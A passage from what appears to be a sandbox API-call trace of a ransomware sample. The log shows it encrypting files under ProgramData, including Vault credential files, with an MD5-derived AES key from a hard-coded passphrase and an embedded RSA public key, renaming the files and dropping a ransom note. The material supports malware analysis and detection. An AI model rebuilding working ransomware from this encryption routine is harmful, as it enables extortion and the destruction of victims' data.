phKey=0x2b9e05c*=0x28463e0) returned 1 [0237.879] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e078, pcbBinary=0x2b9e058, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e078, pcbBinary=0x2b9e058, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0237.879] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e078, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e04c, pcbStructInfo=0x2b9e054 | out: pvStructInfo=0x2b9e04c, pcbStructInfo=0x2b9e054) returned 1 [0237.879] CryptAcquireContextA (in: phProv=0x2b9e068, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e068*=0x2859260) returned 1 [0237.879] CryptImportPublicKeyInfo (in: hCryptProv=0x2859260, dwCertEncodingType=0x1, pInfo=0x2850ab8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2850ae8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2850af0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e060 | out: phKey=0x2b9e060*=0x2846720) returned 1 [0237.879] CryptEncrypt (in: hKey=0x2846720, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e050*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e050*=0x80) returned 1 [0237.879] CryptEncrypt (in: hKey=0x2846720, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2859e10*, pdwDataLen=0x2b9e064*=0x18, dwBufLen=0x80 | out: pbData=0x2859e10*, pdwDataLen=0x2b9e064*=0x80) returned 1 [0237.880] WriteFile (in: hFile=0x5d10, lpBuffer=0x2859e10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x2859e10*, lpNumberOfBytesWritten=0x2b9e074*=0x80, lpOverlapped=0x0) returned 1 [0237.881] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2868998, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x2868998, lpNumberOfBytesRead=0x2b9e074*=0x0, lpOverlapped=0x0) returned 0 [0237.881] CryptEncrypt (in: hKey=0x28463e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2868998*, pdwDataLen=0x2b9e074*=0x0, dwBufLen=0x400 | out: pbData=0x2868998*, pdwDataLen=0x2b9e074*=0x10) returned 1 [0237.881] WriteFile (in: hFile=0x5d10, lpBuffer=0x2868998*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x2868998*, lpNumberOfBytesWritten=0x2b9e074*=0x10, lpOverlapped=0x0) returned 1 [0237.881] CloseHandle (hObject=0xffffffff) returned 1 [0237.881] CloseHandle (hObject=0x5d10) returned 1 [0237.883] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\User Account Pictures\\user.bmp.gsg" (normalized: "c:\\programdata\\microsoft\\user account pictures\\user.bmp.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\User Account Pictures\\user.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\user.bmp"), bFailIfExists=0) returned 0 [0237.888] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\User Account Pictures\\user.bmp", dwFileAttributes=0x0) returned 0 [0237.888] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\User Account Pictures\\user.bmp.gsg" (normalized: "c:\\programdata\\microsoft\\user account pictures\\user.bmp.gsg")) returned 0 [0237.889] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\User Account Pictures\\user.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\user.bmp"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\User Account Pictures\\user.bmp.fuck" (normalized: "c:\\programdata\\microsoft\\user account pictures\\user.bmp.fuck")) returned 0 [0237.889] CryptDestroyHash (hHash=0x2845de0) returned 1 [0237.889] CryptDestroyKey (hKey=0x28463e0) returned 1 [0237.889] CryptReleaseContext (hProv=0x2858160, dwFlags=0x0) returned 1 [0237.889] FindNextFileA (in: hFindFile=0x2845ea0, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0237.889] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f070 | out: lpSystemTimeAsFileTime=0x2b9f070) [0237.889] GetLastError () returned 0x5 [0237.889] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\User Account Pictures\\user.png" (normalized: "c:\\programdata\\microsoft\\user account pictures\\user.png")) returned 0x20 [0237.890] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\User Account Pictures\\user.png", dwFileAttributes=0x80) returned 0 [0237.890] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\User Account Pictures\\user.png" (normalized: "c:\\programdata\\microsoft\\user account pictures\\user.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.890] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\User Account Pictures\\user.png.gsg" (normalized: "c:\\programdata\\microsoft\\user account pictures\\user.png.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d10 [0237.891] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\User Account Pictures\\user.png.gsg", dwFileAttributes=0x2) returned 0 [0237.892] CryptAcquireContextA (in: phProv=0x2b9e06c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e06c*=0x2858160) returned 1 [0237.894] CryptCreateHash (in: hProv=0x2858160, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e070 | out: phHash=0x2b9e070) returned 1 [0237.894] lstrlenA (lpString="GASinrxNGZdGxepxtSAFGoQZzMlQm") returned 29 [0237.894] CryptHashData (hHash=0x2845de0, pbData=0x2ecb70, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0237.894] CryptDeriveKey (in: hProv=0x2858160, Algid=0x6610, hBaseData=0x2845de0, dwFlags=0x1000000, phKey=0x2b9e05c | out: phKey=0x2b9e05c*=0x28463e0) returned 1 [0237.894] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e078, pcbBinary=0x2b9e058, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e078, pcbBinary=0x2b9e058, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0237.894] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e078, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e04c, pcbStructInfo=0x2b9e054 | out: pvStructInfo=0x2b9e04c, pcbStructInfo=0x2b9e054) returned 1 [0237.894] CryptAcquireContextA (in: phProv=0x2b9e068, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e068*=0x2859838) returned 1 [0237.895] CryptImportPublicKeyInfo (in: hCryptProv=0x2859838, dwCertEncodingType=0x1, pInfo=0x2850848*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2850878*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2850880*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e060 | out: phKey=0x2b9e060*=0x2846760) returned 1 [0237.895] CryptEncrypt (in: hKey=0x2846760, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e050*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e050*=0x80) returned 1 [0237.895] CryptEncrypt (in: hKey=0x2846760, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2859370*, pdwDataLen=0x2b9e064*=0x18, dwBufLen=0x80 | out: pbData=0x2859370*, pdwDataLen=0x2b9e064*=0x80) returned 1 [0237.895] WriteFile (in: hFile=0x5d10, lpBuffer=0x2859370*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x2859370*, lpNumberOfBytesWritten=0x2b9e074*=0x80, lpOverlapped=0x0) returned 1 [0237.896] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2868998, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x2868998, lpNumberOfBytesRead=0x2b9e074*=0x0, lpOverlapped=0x0) returned 0 [0237.896] CryptEncrypt (in: hKey=0x28463e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2868998*, pdwDataLen=0x2b9e074*=0x0, dwBufLen=0x400 | out: pbData=0x2868998*, pdwDataLen=0x2b9e074*=0x10) returned 1 [0237.896] WriteFile (in: hFile=0x5d10, lpBuffer=0x2868998*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x2868998*, lpNumberOfBytesWritten=0x2b9e074*=0x10, lpOverlapped=0x0) returned 1 [0237.896] CloseHandle (hObject=0xffffffff) returned 1 [0237.896] CloseHandle (hObject=0x5d10) returned 1 [0237.899] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\User Account Pictures\\user.png.gsg" (normalized: "c:\\programdata\\microsoft\\user account pictures\\user.png.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\User Account Pictures\\user.png" (normalized: "c:\\programdata\\microsoft\\user account pictures\\user.png"), bFailIfExists=0) returned 0 [0237.905] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\User Account Pictures\\user.png", dwFileAttributes=0x0) returned 0 [0237.905] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\User Account Pictures\\user.png.gsg" (normalized: "c:\\programdata\\microsoft\\user account pictures\\user.png.gsg")) returned 0 [0237.906] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\User Account Pictures\\user.png" (normalized: "c:\\programdata\\microsoft\\user account pictures\\user.png"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\User Account Pictures\\user.png.fuck" (normalized: "c:\\programdata\\microsoft\\user account pictures\\user.png.fuck")) returned 0 [0237.906] CryptDestroyHash (hHash=0x2845de0) returned 1 [0237.906] CryptDestroyKey (hKey=0x28463e0) returned 1 [0237.906] CryptReleaseContext (hProv=0x2858160, dwFlags=0x0) returned 1 [0237.906] FindNextFileA (in: hFindFile=0x2845ea0, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0 [0237.906] FindClose (in: hFindFile=0x2845ea0 | out: hFindFile=0x2845ea0) returned 1 [0237.906] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\User Account Pictures\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\user account pictures\\readme_back_files.htm")) returned 0xffffffff [0237.906] AreFileApisANSI () returned 1 [0237.906] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2f6e78, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 70 [0237.907] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\User Account Pictures\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\user account pictures\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9f2e4, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d08 [0237.907] GetFileType (hFile=0x5d08) returned 0x1 [0237.907] WriteFile (in: hFile=0x5d08, lpBuffer=0x2b9df30*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9df28, lpOverlapped=0x0 | out: lpBuffer=0x2b9df30*, lpNumberOfBytesWritten=0x2b9df28*=0x5ec, lpOverlapped=0x0) returned 1 [0237.908] FindNextFileA (in: hFindFile=0x2716c68, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0237.908] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\Vault\\*.*", lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0x2846460 [0237.909] FindNextFileA (in: hFindFile=0x2846460, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0237.909] FindNextFileA (in: hFindFile=0x2846460, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0237.909] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x2845de0 [0237.909] FindNextFileA (in: hFindFile=0x2845de0, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0237.909] FindNextFileA (in: hFindFile=0x2845de0, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0237.909] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0237.909] GetLastError () returned 0x0 [0237.909] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\154E23D0-C644-4E6F-8CE6-5069272F999F.vsch" (normalized: "c:\\programdata\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\154e23d0-c644-4e6f-8ce6-5069272f999f.vsch")) returned 0x20 [0237.909] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\154E23D0-C644-4E6F-8CE6-5069272F999F.vsch", dwFileAttributes=0x80) returned 0 [0237.909] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\154E23D0-C644-4E6F-8CE6-5069272F999F.vsch" (normalized: "c:\\programdata\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\154e23d0-c644-4e6f-8ce6-5069272f999f.vsch"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.910] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\154E23D0-C644-4E6F-8CE6-5069272F999F.vsch.gsg" (normalized: "c:\\programdata\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\154e23d0-c644-4e6f-8ce6-5069272f999f.vsch.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.910] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\154E23D0-C644-4E6F-8CE6-5069272F999F.vsch.gsg", dwFileAttributes=0x2) returned 0 [0237.910] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x2859040) returned 1 [0237.913] CryptCreateHash (in: hProv=0x2859040, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0237.913] lstrlenA (lpString="GASinrxNGZdGxepxtSAFGoQZzMlQm") returned 29 [0237.913] CryptHashData (hHash=0x28463e0, pbData=0x2ecb70, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0237.913] CryptDeriveKey (in: hProv=0x2859040, Algid=0x6610, hBaseData=0x28463e0, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x2846ba0) returned 1 [0237.913] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0237.913] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0237.913] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x2859590) returned 1 [0237.914] CryptImportPublicKeyInfo (in: hCryptProv=0x2859590, dwCertEncodingType=0x1, pInfo=0x286a2f8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x286a328*, PublicKey.cbData=0x8c, PublicKey.pbData=0x286a330*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x2846ae0) returned 1 [0237.914] CryptEncrypt (in: hKey=0x2846ae0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0237.914] CryptEncrypt (in: hKey=0x2846ae0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28599d0*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x28599d0*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0237.914] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28599d0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0237.914] ReadFile (in: hFile=0xffffffff, lpBuffer=0x286c9a0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x286c9a0, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0237.914] CryptEncrypt (in: hKey=0x2846ba0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x286c9a0*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x286c9a0*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0237.914] WriteFile (in: hFile=0xffffffff, lpBuffer=0x286c9a0, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0237.915] CloseHandle (hObject=0xffffffff) returned 1 [0237.915] CloseHandle (hObject=0xffffffff) returned 1 [0237.915] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\154E23D0-C644-4E6F-8CE6-5069272F999F.vsch.gsg" (normalized: "c:\\programdata\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\154e23d0-c644-4e6f-8ce6-5069272f999f.vsch.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\154E23D0-C644-4E6F-8CE6-5069272F999F.vsch" (normalized: "c:\\programdata\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\154e23d0-c644-4e6f-8ce6-5069272f999f.vsch"), bFailIfExists=0) returned 0 [0237.915] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\154E23D0-C644-4E6F-8CE6-5069272F999F.vsch", dwFileAttributes=0x0) returned 0 [0237.915] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\154E23D0-C644-4E6F-8CE6-5069272F999F.vsch.gsg" (normalized: "c:\\programdata\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\154e23d0-c644-4e6f-8ce6-5069272f999f.vsch.gsg")) returned 0 [0237.916] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\154E23D0-C644-4E6F-8CE6-5069272F999F.vsch" (normalized: "c:\\programdata\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\154e23d0-c644-4e6f-8ce6-5069272f999f.vsch"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\154E23D0-C644-4E6F-8CE6-5069272F999F.vsch.fuck" (normalized: "c:\\programdata\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\154e23d0-c644-4e6f-8ce6-5069272f999f.vsch.fuck")) returned 0 [0237.916] CryptDestroyHash (hHash=0x28463e0) returned 1 [0237.916] CryptDestroyKey (hKey=0x2846ba0) returned 1 [0237.916] CryptReleaseContext (hProv=0x2859040, dwFlags=0x0) returned 1 [0237.916] FindNextFileA (in: hFindFile=0x2845de0, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0237.916] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0237.916] GetLastError () returned 0x5 [0237.916] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\2F1A6504-0641-44CF-8BB5-3612D865F2E5.vsch" (normalized: "c:\\programdata\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\2f1a6504-0641-44cf-8bb5-3612d865f2e5.vsch")) returned 0x20 [0237.916] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\2F1A6504-0641-44CF-8BB5-3612D865F2E5.vsch", dwFileAttributes=0x80) returned 0 [0237.917] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\2F1A6504-0641-44CF-8BB5-3612D865F2E5.vsch" (normalized: "c:\\programdata\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\2f1a6504-0641-44cf-8bb5-3612d865f2e5.vsch"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.917] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\2F1A6504-0641-44CF-8BB5-3612D865F2E5.vsch.gsg" (normalized: "c:\\programdata\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\2f1a6504-0641-44cf-8bb5-3612d865f2e5.vsch.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.917] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\2F1A6504-0641-44CF-8BB5-3612D865F2E5.vsch.gsg", dwFileAttributes=0x2) returned 0 [0237.917] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x2859ae0) returned 1 [0237.920] CryptCreateHash (in: hProv=0x2859ae0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0237.920] lstrlenA (lpString="GASinrxNGZdGxepxtSAFGoQZzMlQm") returned 29 [0237.920] CryptHashData (hHash=0x28463e0, pbData=0x2ecb70, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0237.920] CryptDeriveKey (in: hProv=0x2859ae0, Algid=0x6610, hBaseData=0x28463e0, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x28467e0) returned 1 [0237.920] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0237.920] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0237.920] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x28596a0) returned 1 [0237.921] CryptImportPublicKeyInfo (in: hCryptProv=0x28596a0, dwCertEncodingType=0x1, pInfo=0x28689c8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28689f8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2868a00*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x2846c20) returned 1 [0237.921] CryptEncrypt (in: hKey=0x2846c20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0237.921] CryptEncrypt (in: hKey=0x2846c20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2858ea8*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x2858ea8*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0237.921] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2858ea8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0237.921] ReadFile (in: hFile=0xffffffff, lpBuffer=0x286c9a0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x286c9a0, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0237.921] 